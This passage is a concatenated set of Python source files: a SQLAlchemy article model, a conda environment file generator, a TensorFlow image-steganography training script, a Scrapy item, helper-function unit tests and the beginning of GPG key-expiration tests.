from sqlalchemy.orm import relationship, sessionmaker
from sqlalchemy import create_engine
Base = declarative_base()
class Knowledge(Base):
# Create a table with 4 columns
# The first column will be the primary key
# The second column should be a string representing
# the name of the Wiki article that you're referencing
# The third column will be a string representing the
# topic of the article. The last column will be
# an integer, representing your rating of the article.
__tablename__= 'articles'
article_id= Column(Integer, primary_key=True)
topic_name=Column(String)
article_topic=Column(String)
article_title=Column(String)
rating=Column(Integer)
def __repr__(self):
return "If you want to learn about {} you should look at the {} article about {}\n" \
"We gave this article a rating of {}" .format(self.topic_name,self.article_title,self.article_topic,self.rating)
|
py | 1a37efb1bab8ec5abfbdc1ab8487b315edf20485 | #!/usr/bin/python
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# This script creates yaml files to build conda environments
# For generating a conda file for running only python code:
# $ python generate_conda_file.py
# For generating a conda file for running python gpu:
# $ python generate_conda_file.py --gpu
# For generating a conda file for running pyspark:
# $ python generate_conda_file.py --pyspark
# For generating a conda file for running python gpu and pyspark:
# $ python generate_conda_file.py --gpu --pyspark
# For generating a conda file for running python gpu and pyspark with a particular version:
# $ python generate_conda_file.py --gpu --pyspark-version 2.4.0
import argparse
import textwrap
from sys import platform
HELP_MSG = """
To create the conda environment:
$ conda env create -f {conda_env}.yaml
To update the conda environment:
$ conda env update -f {conda_env}.yaml
To register the conda environment in Jupyter:
$ conda activate {conda_env}
$ python -m ipykernel install --user --name {conda_env} --display-name "Python ({conda_env})"
"""
CHANNELS = ["defaults", "conda-forge", "pytorch", "fastai"]
CONDA_BASE = {
"bottleneck": "bottleneck==1.2.1",
"dask": "dask>=0.17.1",
"fastparquet": "fastparquet>=0.1.6",
"ipykernel": "ipykernel>=4.6.1",
"jupyter": "jupyter>=1.0.0",
"matplotlib": "matplotlib>=2.2.2",
"mock": "mock==2.0.0",
"numpy": "numpy>=1.13.3",
"pandas": "pandas>=0.23.4",
"pip": "pip>=19.0.3",
"python": "python==3.6.8",
"pytest": "pytest>=3.6.4",
"pytorch": "pytorch-cpu>=1.0.0",
"seaborn": "seaborn>=0.8.1",
"scikit-learn": "scikit-learn==0.19.1",
"scipy": "scipy>=1.0.0",
"scikit-surprise": "scikit-surprise>=1.0.6",
"swig": "swig==3.0.12",
"tensorflow": "tensorflow==1.12.0",
"lightgbm": "lightgbm==2.2.1",
"cornac": "cornac>=1.1.2",
"fastai": "fastai==1.0.46",
"papermill": "papermill==0.19.1",
}
CONDA_PYSPARK = {"pyarrow": "pyarrow>=0.8.0", "pyspark": "pyspark==2.3.1"}
CONDA_GPU = {
"numba": "numba>=0.38.1",
"pytorch": "pytorch>=1.0.0",
"tensorflow": "tensorflow-gpu==1.12.0",
}
PIP_BASE = {
"azureml-sdk[notebooks,tensorboard]": "azureml-sdk[notebooks,tensorboard]==1.0.18",
"azure-storage": "azure-storage>=0.36.0",
"black": "black>=18.6b4",
"category_encoders": "category_encoders>=1.3.0",
"dataclasses": "dataclasses>=0.6",
"hyperopt": "hyperopt==0.1.1",
"idna": "idna==2.7",
"locustio": "locustio==0.11.0",
"memory-profiler": "memory-profiler>=0.54.0",
"nbconvert": "nbconvert==5.5.0",
"pydocumentdb": "pydocumentdb>=2.3.3",
"pymanopt": "pymanopt==0.2.3",
"tqdm": "tqdm==4.31.1",
}
PIP_GPU = {"nvidia-ml-py3": "nvidia-ml-py3>=7.352.0"}
PIP_PYSPARK = {"databricks-cli": "databricks-cli==0.8.6"}
PIP_DARWIN = {
"nni": "nni==0.5.2.1.1",
}
PIP_LINUX = {
"nni": "nni==0.5.2.1.1",
}
PIP_WIN32 = {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=textwrap.dedent(
"""
This script generates a conda file for different environments.
Plain python is the default, but flags can be used to support PySpark and GPU functionality"""
),
epilog=HELP_MSG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--name", help="specify name of conda environment")
parser.add_argument(
"--gpu", action="store_true", help="include packages for GPU support"
)
parser.add_argument(
"--pyspark", action="store_true", help="include packages for PySpark support"
)
parser.add_argument(
"--pyspark-version", help="provide specific version of PySpark to use"
)
args = parser.parse_args()
# check pyspark version
if args.pyspark_version is not None:
args.pyspark = True
pyspark_version_info = args.pyspark_version.split(".")
if len(pyspark_version_info) != 3 or any(
[not x.isdigit() for x in pyspark_version_info]
):
raise TypeError(
"PySpark version input must be valid numeric format (e.g. --pyspark-version=2.3.1)"
)
else:
args.pyspark_version = "2.3.1"
# set name for environment and output yaml file
conda_env = "reco_base"
if args.gpu and args.pyspark:
conda_env = "reco_full"
elif args.gpu:
conda_env = "reco_gpu"
elif args.pyspark:
conda_env = "reco_pyspark"
# overwrite environment name with user input
if args.name is not None:
conda_env = args.name
# update conda and pip packages based on flags provided
conda_packages = CONDA_BASE
pip_packages = PIP_BASE
if args.pyspark:
conda_packages.update(CONDA_PYSPARK)
conda_packages["pyspark"] = "pyspark=={}".format(args.pyspark_version)
pip_packages.update(PIP_PYSPARK)
if args.gpu:
conda_packages.update(CONDA_GPU)
pip_packages.update(PIP_GPU)
# check for os platform support
if platform == 'darwin':
pip_packages.update(PIP_DARWIN)
elif platform.startswith('linux'):
pip_packages.update(PIP_LINUX)
elif platform == 'win32':
pip_packages.update(PIP_WIN32)
else:
raise Exception('Unsupported platform, must be Windows, Linux, or macOS')
# write out yaml file
conda_file = "{}.yaml".format(conda_env)
with open(conda_file, "w") as f:
for line in HELP_MSG.format(conda_env=conda_env).split("\n"):
f.write("# {}\n".format(line))
f.write("name: {}\n".format(conda_env))
f.write("channels:\n")
for channel in CHANNELS:
f.write("- {}\n".format(channel))
f.write("dependencies:\n")
for conda_package in conda_packages.values():
f.write("- {}\n".format(conda_package))
f.write("- pip:\n")
for pip_package in pip_packages.values():
f.write(" - {}\n".format(pip_package))
print("Generated conda file: {}".format(conda_file))
print(HELP_MSG.format(conda_env=conda_env))
|
py | 1a37efe350a78e2f3945d6ca9b23e7dd0b1de9d7 | # from __future__ import absolute_import
# from __future__ import division
# from __future__ import print_function
import os
import time
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import numpy as np
# import cv2
import tensorflow as tf
from tensorflow.data import Iterator
from Dataset import SegDataLoader, VocRgbDataLoader, VocDataLoader, LfwRgbDataLoader, ImageNetRgbDataLoader
from visulize import save_test_images
from utils import rgb2yuv_tf, yuv2rgb_tf
from model import Discriminator, encode_net, decode_net
from ResNet import resnet_nopooling
class Model():
def __init__(self):
self.run_time = time.strftime("%m%d-%H%M")
# self.learning_rate = 0.0001
self.starter_learning_rate = 0.001
self.epoches = 70
self.log_path = 'logs/'+self.run_time + '/'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
self.sess = tf.InteractiveSession(config=config)
self.secret_tensor = tf.placeholder(shape=[None, 256, 256, 3], dtype=tf.float32, name="secret_tensor")
self.cover_tensor = tf.placeholder(shape=[None, 256, 256, 3], dtype=tf.float32, name="cover_tensor")
self.cover_yuv = rgb2yuv_tf(self.cover_tensor)
self.secret_yuv = rgb2yuv_tf(self.secret_tensor)
self.global_step_tensor = tf.Variable(0, trainable=False, name='global_step')
# self.test_op = self.prepare_test_graph(self.secret_tensor, self.cover_tensor)
def get_hiding_network_op(self, cover_tensor, secret_tensor, is_training):
concat_input = tf.concat([cover_tensor, secret_tensor], axis=-1, name='images_features_concat')
# output = resnet_nopooling(concat_input, name='encode', n_class=3, dilate=[2,4,8,16], is_training=is_training)
output = resnet_nopooling(concat_input, name='encode', n_class=3, is_training=is_training)
return output
def get_reveal_network_op(self, container_tensor, is_training):
output = resnet_nopooling(container_tensor, name='decode', n_class=3, is_training=is_training)
return output
def get_noise_layer_op(self,tensor,std=.1):
# with tf.variable_scope("noise_layer"):
# return tensor + tf.random_normal(shape=tf.shape(tensor), mean=0.0, stddev=std, dtype=tf.float32)
return tensor
def get_loss_op(self,secret_true,secret_pred,cover_true,cover_pred):
# D_real_secret = Discriminator(secret_true)
# D_fake_secret = Discriminator(secret_pred, reusing=True)
# D_real = Discriminator(cover_true, reusing=True)
# D_fake = Discriminator(cover_pred, reusing=True)
# D_real_secret = Discriminator(secret_true, name='secret', reusing=False)
# D_fake_secret = Discriminator(secret_pred, name='secret', reusing=True)
# D_real = Discriminator(cover_true, name='cover', reusing=False)
# D_fake = Discriminator(cover_pred, name='cover', reusing=True)
#
# D_real = tf.concat([D_real, D_real_secret], axis=0, name='gan_true_concat')
# D_fake = tf.concat([D_fake, D_fake_secret], axis=0, name='gan_pred_concat')
#
# D_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real, labels=tf.ones_like(D_real)) + tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.zeros_like(D_fake)))
# G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.ones_like(D_fake)))
with tf.variable_scope("huber_losses"):
# secret_mse = tf.losses.mean_squared_error(secret_true,secret_pred)
# cover_mse = tf.losses.mean_squared_error(cover_true,cover_pred)
# secret_mse = tf.reduce_mean(tf.losses.huber_loss(secret_true, secret_pred, delta=0.5))
# cover_mse = tf.reduce_mean(tf.losses.huber_loss(cover_true, cover_pred, delta=0.5))
secret_mse = tf.reduce_mean(tf.losses.absolute_difference(secret_true, secret_pred))
cover_mse = tf.reduce_mean(tf.losses.absolute_difference(cover_true, cover_pred))
with tf.variable_scope("ssim_losses"):
#secret_ssim = 1. - tf.reduce_mean(tf.image.ssim(secret_true, secret_pred, max_val=1.0))
#cover_ssim = 1. - tf.reduce_mean(tf.image.ssim(cover_true, cover_pred, max_val=1.0))
secret_ssim = 1. - (tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,:1],secret_pred[:,:,:,:1], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,1:2],secret_pred[:,:,:,1:2], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,2:],secret_pred[...,2:], max_val=1.0)))/3.
cover_ssim = 1. - (tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,:1],cover_pred[:,:,:,:1], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,1:2],cover_pred[:,:,:,1:2], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,2:],cover_pred[:,:,:,2:], max_val=1.0)))/3.
# D_final_loss = cover_mse + secret_mse + secret_ssim + cover_ssim + D_loss
# D_final_loss = D_loss
G_final_loss = 5*cover_mse + 5*secret_mse + secret_ssim + cover_ssim
# G_final_loss = cover_mse + secret_mse + secret_ssim + cover_ssim
# return D_final_loss, G_final_loss, D_loss, G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
return G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
def get_tensor_to_img_op(self,tensor):
with tf.variable_scope("",reuse=True):
# t = tensor*tf.convert_to_tensor([0.229, 0.224, 0.225]) + tf.convert_to_tensor([0.485, 0.456, 0.406])
tensor = yuv2rgb_tf(tensor)
return tf.clip_by_value(tensor,0,1)
# return tf.clip_by_value(tensor,0,255)
def prepare_training_graph(self,secret_tensor,cover_tensor,global_step_tensor):
hidden = self.get_hiding_network_op(cover_tensor=cover_tensor, secret_tensor=secret_tensor, is_training=True)
reveal_output_op = self.get_reveal_network_op(hidden, is_training=True)
G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = self.get_loss_op(secret_tensor,reveal_output_op,cover_tensor,hidden)
global_variables = tf.global_variables()
gan_varlist = [i for i in global_variables if i.name.startswith('Discriminator')]
en_de_code_varlist = [i for i in global_variables if i not in gan_varlist]
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# train_op = optimiser.minimize(loss, global_step=global_step)
# D_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(D_final_loss, var_list=gan_varlist, global_step=global_step_tensor)
G_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(G_final_loss, var_list=en_de_code_varlist, global_step=global_step_tensor)
# G_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(G_final_loss, global_step=global_step_tensor)
# tf.summary.scalar('D_loss', D_final_loss,family='train')
tf.summary.scalar('G_loss', G_final_loss,family='train')
tf.summary.scalar('secret_mse', secret_mse,family='train')
tf.summary.scalar('cover_mse', cover_mse,family='train')
tf.summary.scalar('learning_rate', self.learning_rate,family='train')
tf.summary.scalar('secret_ssim', secret_ssim)
tf.summary.scalar('cover_ssim', cover_ssim)
tf.summary.image('secret',self.get_tensor_to_img_op(secret_tensor),max_outputs=1,family='train')
tf.summary.image('cover',self.get_tensor_to_img_op(cover_tensor),max_outputs=1,family='train')
tf.summary.image('hidden',self.get_tensor_to_img_op(hidden),max_outputs=1,family='train')
# tf.summary.image('hidden_noisy',self.get_tensor_to_img_op(noise_add_op),max_outputs=1,family='train')
tf.summary.image('revealed',self.get_tensor_to_img_op(reveal_output_op),max_outputs=1,family='train')
merged_summary_op = tf.summary.merge_all()
return G_minimize_op, G_final_loss, merged_summary_op, secret_mse,cover_mse, secret_ssim, cover_ssim
def prepare_test_graph(self,secret_tensor,cover_tensor):
# y_output, hiding_output_op = self.get_hiding_network_op(cover_tensor=cover_tensor,secret_tensor=secret_tensor, is_training=True)
hidden = self.get_hiding_network_op(cover_tensor=cover_tensor,secret_tensor=secret_tensor, is_training=False)
# reveal_output_op = self.get_reveal_network_op(y_output, is_training=True)
reveal_output_op = self.get_reveal_network_op(hidden, is_training=False)
G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = self.get_loss_op(secret_tensor,reveal_output_op,cover_tensor,hidden)
# tf.summary.scalar('loss', loss_op,family='test')
# tf.summary.scalar('reveal_net_loss', secret_loss_op,family='test')
# tf.summary.scalar('cover_net_loss', cover_loss_op,family='test')
#
# tf.summary.image('secret',self.get_tensor_to_img_op(secret_tensor),max_outputs=1,family='test')
# tf.summary.image('cover',self.get_tensor_to_img_op(cover_tensor),max_outputs=1,family='test')
# tf.summary.image('hidden',self.get_tensor_to_img_op(hiding_output_op),max_outputs=1,family='test')
# tf.summary.image('revealed',self.get_tensor_to_img_op(reveal_output_op),max_outputs=1,family='test')
# merged_summary_op = tf.summary.merge_all()
return hidden, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
def save_chkp(self,path):
global_step = self.sess.run(self.global_step_tensor)
self.saver.save(self.sess,path,global_step)
def load_chkp(self,path):
self.saver.restore(self.sess,path)
print("LOADED")
def train(self):
with tf.device('/cpu:0'):
# segdl = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 4, (256, 256), (256, 256), 'voc_train.txt', split='train')
# segdl_val = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 4, (256, 256), (256, 256), 'voc_valid.txt', split='val')
#segdl = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 2, (256, 256), (256, 256),
# 'dataset/lfw_train.txt', split='train')
#segdl_val = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 2, (256, 256), (256, 256),
# 'dataset/lfw_valid.txt', split='val')
segdl = ImageNetRgbDataLoader('/home/jion/moliq/Documents/imagenet/ILSVRC2012_img_val/', 4, (256, 256), (256, 256),
'dataset/imagenet_train.txt', split='train')
segdl_val = ImageNetRgbDataLoader('/home/jion/moliq/Documents/imagenet/ILSVRC2012_img_test/', 4, (256, 256), (256, 256),
'dataset/imagenet_valid.txt', split='val')
iterator = Iterator.from_structure(segdl.data_tr.output_types, segdl.data_tr.output_shapes)
iterator_val = Iterator.from_structure(segdl_val.data_tr.output_types, segdl_val.data_tr.output_shapes)
next_batch = iterator.get_next()
next_batch_val = iterator_val.get_next()
training_init_op = iterator.make_initializer(segdl.data_tr)
training_init_op_val = iterator_val.make_initializer(segdl_val.data_tr)
steps_per_epoch = segdl.data_len / segdl.batch_size
steps_per_epoch_val = segdl_val.data_len / segdl_val.batch_size
self.learning_rate = tf.train.exponential_decay(self.starter_learning_rate, self.global_step_tensor,
steps_per_epoch*15, 0.1, staircase=True)
self.train_op_G, G_final_loss, self.summary_op, self.secret_mse, self.cover_mse, self.secret_ssim, self.cover_ssim = \
self.prepare_training_graph(self.secret_yuv, self.cover_yuv, self.global_step_tensor)
if not os.path.exists(self.log_path):
os.makedirs(self.log_path)
self.writer = tf.summary.FileWriter(self.log_path, self.sess.graph)
self.sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver(max_to_keep=30)
# beta1_power = self.sess.graph.get_tensor_by_name('beta1_power:0')
# out = self.sess.run(beta1_power)
# print('beta1_power ', out)
# exclude_vars = ['beta1_power:0', 'beta2_power:0', 'global_step:0']
# exclude_vars = ['']
# restore_variables = [i for i in tf.global_variables() if not i.name in exclude_vars]
saver = tf.train.Saver()
loader = tf.train.latest_checkpoint('logs/0509-0030')
saver.restore(self.sess, loader)
print('loaded pretrained model')
#beta1_power = self.sess.graph.get_tensor_by_name('beta1_power:0')
#out = self.sess.run(beta1_power)
#print('beta1_power ', out)
for epoch in range(1, 1+self.epoches):
print('epoch %d'%epoch)
self.sess.run(training_init_op)
for i in range(steps_per_epoch):
cover_tensor, secret_tensor = self.sess.run(next_batch)
_, G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim, summary, global_step = \
self.sess.run([self.train_op_G, G_final_loss, self.secret_mse, self.cover_mse, self.secret_ssim, self.cover_ssim, self.summary_op, self.global_step_tensor],
feed_dict={self.secret_tensor: secret_tensor, self.cover_tensor: cover_tensor})
self.writer.add_summary(summary, global_step)
# if i % 5 == 0:
# _, D_loss, summary = \
# self.sess.run([self.train_op_D, D_final_loss, self.summary_op],
# feed_dict={self.secret_tensor: secret_tensor,self.cover_tensor: cover_tensor})
# self.writer.add_summary(summary, global_step)
if i % 30 == 0:
print('Epoch [{}/{}] Step [{}/{}] G_Loss {:.4f} encoder_ssim {:.4f} encoder_mse {:.4f}'
' decoder_ssim {:.4f} decoder_mse {:.4f} '.format(
epoch, self.epoches, i, steps_per_epoch, G_loss,
cover_ssim, cover_mse, secret_ssim, secret_mse ))
# run validation
self.sess.run(training_init_op_val)
# D_loss_val_this_epoch = []
G_loss_val_this_epoch = []
secret_ssim_this_epoch = []
cover_ssim_this_epoch = []
for i in range(steps_per_epoch_val):
cover_tensor_val, secret_tensor_val = self.sess.run(next_batch_val)
G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = \
self.sess.run([G_final_loss, self.secret_mse,self.cover_mse, self.secret_ssim, self.cover_ssim],
feed_dict={self.secret_tensor: secret_tensor_val,
self.cover_tensor: cover_tensor_val})
# D_loss_val_this_epoch.append(D_loss)
G_loss_val_this_epoch.append(G_loss)
secret_ssim_this_epoch.append(secret_ssim)
cover_ssim_this_epoch.append(cover_ssim)
# mean_D_loss_val_this_epoch = sum(D_loss_val_this_epoch) / len(D_loss_val_this_epoch)
mean_G_loss_val_this_epoch = sum(G_loss_val_this_epoch) / len(G_loss_val_this_epoch)
mean_secret_ssim_this_epoch = sum(secret_ssim_this_epoch) / len(secret_ssim_this_epoch)
mean_cover_ssim_this_epoch = sum(cover_ssim_this_epoch) / len(cover_ssim_this_epoch)
# print('global step: %d, validation loss: %.4f'%(global_step, mean_loss_val_this_epoch))
print('VALIDATION Epoch {} global step {} G_Loss {:.4f} encoder_ssim {:.4f} decoder_ssim {:.4f}'.format(
epoch, global_step, mean_G_loss_val_this_epoch,
mean_cover_ssim_this_epoch, mean_secret_ssim_this_epoch))
# self.save_chkp(self.log_path+'%d_%.3f.ckpt'%(epoch, mean_loss_val_this_epoch))
self.save_chkp(self.log_path)
def test_performance(self, log_path):
hiding_output_op, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = \
self.prepare_test_graph(self.secret_yuv, self.cover_yuv)
loader = tf.train.latest_checkpoint(log_path)
# from tensorflow.python.tools import inspect_checkpoint as chkp
# chkp.print_tensors_in_checkpoint_file(loader, tensor_name='', all_tensors=True)
# from inspect_checkpoint import print_tensors_in_checkpoint_file
# print_tensors_in_checkpoint_file(loader, tensor_name='', all_tensors=True)
# variables = [i for i in tf.global_variables() if i.name not in ['global_step:0']]
# saver_variables_dict = {value.name[:-2]:value for value in variables}
# custom_saver = tf.train.Saver(saver_variables_dict)
# custom_saver.restore(self.sess, loader)
# print('load model %s'%loader)
# self.saver = tf.train.Saver(var_list=tf.global_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess, loader)
print('load model %s'%loader)
with tf.device('/cpu:0'):
# segdl_val = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 16, (256, 256), (256, 256), 'voc_valid.txt', split='val')
segdl_val = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 16, (256, 256), (256, 256),
'dataset/lfw_valid.txt', split='val')
iterator_val = Iterator.from_structure(segdl_val.data_tr.output_types, segdl_val.data_tr.output_shapes)
next_batch_val = iterator_val.get_next()
training_init_op_val = iterator_val.make_initializer(segdl_val.data_tr)
steps_per_epoch_val = segdl_val.data_len / segdl_val.batch_size
loss_val_this_epoch = []
secret_mse_val_this_epoch = []
cover_mse_val_this_epoch = []
secret_ssim_this_epoch = []
cover_ssim_this_epoch = []
self.sess.run(training_init_op_val)
# self.saver.restore(self.sess, loader)
# print('load model %s'%loader)
for i in range(steps_per_epoch_val):
cover_tensor_val, secret_tensor_val = self.sess.run(next_batch_val)
stego, secret_reveal, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value = \
self.sess.run([hiding_output_op, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim],
feed_dict={self.secret_tensor: secret_tensor_val,
self.cover_tensor: cover_tensor_val})
cover_names = segdl_val.imgs_files[i*segdl_val.batch_size:(i+1)*segdl_val.batch_size]
secret_names = segdl_val.labels_files[i*segdl_val.batch_size:(i+1)*segdl_val.batch_size]
loss_val_this_epoch.append(loss_value)
secret_mse_val_this_epoch.append(secret_mse_value)
cover_mse_val_this_epoch.append(cover_mse_value)
secret_ssim_this_epoch.append(secret_ssim_value)
cover_ssim_this_epoch.append(cover_ssim_value)
if i%10 == 0:
print('%d %.3f %.3f %.3f %.3f %.3f'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value))
save_test_images(cover_names, secret_names, cover_tensor_val, secret_tensor_val, stego, secret_reveal, log_path)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_cover.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), cover_tensor_val)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_secret.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), secret_tensor_val)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_stego.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), stego)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_secret_reveal.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), secret_reveal)
# mean_loss_val_this_epoch = sum(loss_val_this_epoch) / len(loss_val_this_epoch)
# mean_secret_mse_val_this_epoch = sum(secret_mse_val_this_epoch) / len(secret_mse_val_this_epoch)
# mean_cover_mse_val_this_epoch = sum(cover_mse_val_this_epoch) / len(cover_mse_val_this_epoch)
# mean_secret_ssim_this_epoch = sum(secret_ssim_this_epoch) / len(secret_ssim_this_epoch)
# mean_cover_ssim_this_epoch = sum(cover_ssim_this_epoch) / len(cover_ssim_this_epoch)
mean_loss_val_this_epoch = np.mean(loss_val_this_epoch)
mean_secret_mse_val_this_epoch = np.mean(secret_mse_val_this_epoch)
mean_cover_mse_val_this_epoch = np.mean(cover_mse_val_this_epoch)
mean_secret_ssim_this_epoch = np.mean(secret_ssim_this_epoch)
mean_cover_ssim_this_epoch = np.mean(cover_ssim_this_epoch)
print('validation loss: %.4f' % mean_loss_val_this_epoch)
print('secret mse: %.4f' % mean_secret_mse_val_this_epoch)
print('cover mse : %.4f' % mean_cover_mse_val_this_epoch)
print('secret ssim: %.4f' % mean_secret_ssim_this_epoch)
print('cover ssim: %.4f' % mean_cover_ssim_this_epoch)
if __name__ == '__main__':
train_model = Model()
train_model.train()
# train_model.test_performance(train_model.log_path)
# train_model.test_performance('logs/0427-1506')
# train_model.test_performance('logs/0428-2048')
# train_model.test_performance('logs/0505-1617')
|
py | 1a37eff129f46428a4a3eccdf02de101bd3c9704 | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class QuotesbotItem(scrapy.Item):
# define the fields for your item here like:
text = scrapy.Field()
author = scrapy.Field()
tags = scrapy.Field()
|
py | 1a37f07dec035377b85c773f9e604ca966899899 | # coding: utf-8
from unittest import TestCase
from forecast.utils import import_object, package_contents, camelize
class HelperFunctionsTest(TestCase):
def test_import_object(self):
module, imported_object = import_object("forecast.tests.settings.base.SETTINGS")
self.assertTrue(repr(module).startswith("<module 'forecast.tests.settings.base' from"))
self.assertIsInstance(imported_object, dict)
def test_fail_import_invalid_module(self):
self.assertRaises(ImportError, import_object, "forecast.tests.unknown")
def test_fail_import_invalid_object(self):
self.assertRaises(ImportError, import_object, "forecast.tests.settings.base.UNKNOWN")
def test_package_contents(self):
modules = package_contents("forecast.tests.test_app.commands")
self.assertIn("cmd", modules)
self.assertIn("__init__", modules)
def test_fail_package_contents_in_module(self):
self.assertRaises(ImportError, package_contents, "forecast.tests.test_app.commands.cmd")
def test_fail_package_contents_with_non_packages(self):
self.assertRaises(ImportError, package_contents, "forecast.tests.nonpackage")
def test_camelize_names(self):
self.assertEqual("Camel", camelize("camel"))
self.assertEqual("CamelCase", camelize("camel_case"))
self.assertEqual("CamelCaseFunctionTransformation", camelize("camel_case_function_transformation"))
self.assertEqual("CamelCase", camelize("camel__case"))
|
py | 1a37f0c5c16e03bffa20c462d42c89b452bd96eb | # glep63-check -- tests for issues related to key expiration
# (c) 2018-2019 Michał Górny
# Released under the terms of 2-clause BSD license.
import datetime
from glep63.base import (PublicKey, Key, UID, KeyAlgo, Validity,
KeyWarning, KeyIssue, SubKeyWarning, SubKeyIssue)
import tests.key_base
class PrimaryKeyNoExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-noexpire.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247201::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=None,
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
}
class PrimaryKeyThreeYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-3y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1627855202::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247202::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
